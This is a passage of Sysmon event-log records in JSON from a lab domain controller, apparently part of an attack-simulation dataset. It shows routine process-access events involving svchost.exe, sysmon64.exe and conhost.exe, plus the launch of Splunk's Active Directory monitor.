08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6780,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:40.726\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:40.726","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6781,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:40.726\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:40.726","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6782,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:40.726\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:40.726","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6783,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:40.726\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:40.726","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6784,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:40.726\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:40.726","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6785,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:40.726\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:40.726","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6786,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:40.726\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:40.726","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6787,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:40.726\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2218-5F25-0000-00108DE70A00}\r\nTargetProcessId: 2380\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:40.726","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2218-5F25-0000-00108DE70A00}","TargetProcessId":"2380","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6788,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:41.399\r\nProcessGuid: {41C8662E-2219-5F25-0000-001033E90A00}\r\nProcessId: 1328\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: 